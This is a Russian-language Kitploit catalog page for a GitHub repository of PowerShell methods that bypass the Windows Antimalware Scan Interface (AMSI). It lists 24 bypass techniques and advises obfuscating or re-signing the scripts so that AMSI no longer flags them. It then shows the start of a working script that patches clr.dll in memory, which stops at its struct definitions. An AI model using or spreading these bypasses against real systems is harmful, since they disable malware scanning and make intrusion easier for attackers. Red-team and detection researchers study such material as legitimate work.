Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Amsi-Bypass-Powershell — Этот репозиторий содержит несколько методов Amsi Bypass, которые я нашёл в разных блогах. | Kitploit
Инструменты/GitHubGitHub/s3cur3th1ssh1t/amsi-bypass-powershell
Оборонительные ИнструментыЭксплуатацияОбход IDS/IPSRed TeamingРазработка Полезной Нагрузки
GitHubs3cur3th1ssh1t/amsi-bypass-powershell

Amsi-Bypass-Powershell

Этот репозиторий содержит несколько методов Amsi Bypass, которые я нашёл в разных блогах.

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
2.2k333671 год назадПроверено Kitploit
Поделиться

Sponsored by

     

Amsi-Bypass-Powershell

Этот репозиторий содержит некоторые методы обхода/избегания Antimalware Scan Interface (AMSI), которые я нашел в разных постах блогов.

Большинство скриптов обнаруживаются самим AMSI. Поэтому вам нужно найти триггер и изменить сигнатуру в соответствующей части с помощью переименования переменных/функций, замены строк или кодирования и декодирования во время выполнения. Альтернативно, обфусцируйте их с помощью ISESteroids и/или Invoke-Obfuscation, чтобы они заработали. Вы также можете взглянуть на мой пост в блоге о ручном изменении сигнатуры, чтобы снова получить рабочий обход.

  1. Patching AmsiScanBuffer in clr.dll
  2. ScriptBlock Smuggling
  3. Reflection ScanContent Change
  4. Using Hardware Breakpoints
  5. Using CLR hooking
  6. Patch the provider’s DLL of Microsoft MpOav.dll
  7. Scanning Interception and Provider function patching
  8. Patching AMSI AmsiScanBuffer by rasta-mouse
  9. Patching AMSI AmsiOpenSession
  10. Dont use net webclient - этот больше не работает
  11. Amsi ScanBuffer Patch from -> https://www.contextis.com/de/blog/amsi-bypass
  12. Forcing an error
  13. Disable Script Logging
  14. Amsi Buffer Patch - In memory
  15. Same as 6 but integer Bytes instead of Base64
  16. Using Matt Graeber's Reflection method
  17. Using Matt Graeber's Reflection method with WMF5 autologging bypass
  18. Using Matt Graeber's second Reflection method
  19. Using Cornelis de Plaa's DLL hijack method
  20. Use Powershell Version 2 - No AMSI Support there
  21. Nishang all in one
  22. Adam Chesters Patch
  23. Modified version of 3. Amsi ScanBuffer - no CSC.exe compilation
  24. Patching the AmsiScanBuffer address in System.Management.Automation.dll

Patching Clr

  • Объяснено здесь Изменение CLR DLL в памяти```powershell

Define Constants

$PAGE_READONLY = 0x02 $PAGE_READWRITE = 0x04 $PAGE_EXECUTE_READWRITE = 0x40 $PAGE_EXECUTE_READ = 0x20 $PAGE_GUARD = 0x100 $MEM_COMMIT = 0x1000 $MAX_PATH = 260

Helper functions

function IsReadable { param ($protect, $state) return ((($protect -band $PAGE_READONLY) -eq $PAGE_READONLY -or ($protect -band $PAGE_READWRITE) -eq $PAGE_READWRITE -or ($protect -band $PAGE_EXECUTE_READWRITE) -eq $PAGE_EXECUTE_READWRITE -or ($protect -band $PAGE_EXECUTE_READ) -eq $PAGE_EXECUTE_READ) -and ($protect -band $PAGE_GUARD) -ne $PAGE_GUARD -and ($state -band $MEM_COMMIT) -eq $MEM_COMMIT) }

function PatternMatch { param ($buffer, $pattern, $index) for ($i = 0; $i -lt $pattern.Length; $i++) { if ($buffer[$index + $i] -ne $pattern[$i]) { return $false } } return $true }

if ($PSVersionTable.PSVersion.Major -gt 2) { # Create module builder $DynAssembly = New-Object System.Reflection.AssemblyName("Win32") $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule("Win32", $False)

# Define structs
$TypeBuilder = $ModuleBuilder.DefineType("Win32.MEMORY_INFO_BASIC", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
[void]$TypeBuilder.DefineField("BaseAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("AllocationBase", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("AllocationProtect", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("RegionSize", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("State", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("Protect", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("Type", [Int32], [System.Reflection.FieldAttributes]::Public)
$MEMORY_INFO_BASIC_STRUCT = $TypeBuilder.CreateType()

# Define structs
$TypeBuilder = $ModuleBuilder.DefineType("Win32.SYSTEM_INFO", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
[void]$TypeBuilder.DefineField("wProcessorArchitecture", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("wReserved", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwPageSize", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("lpMinimumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("lpMaximumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwActiveProcessorMask", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwNumberOfProcessors", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwProcessorType", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwAllocationGranularity", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("wProcessorLevel", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("wProcessorRevision", [UInt16], [System.Reflection.FieldAttributes]::Public)
$SYSTEM_INFO_STRUCT = $TypeBuilder.CreateType()
Скачать инструмент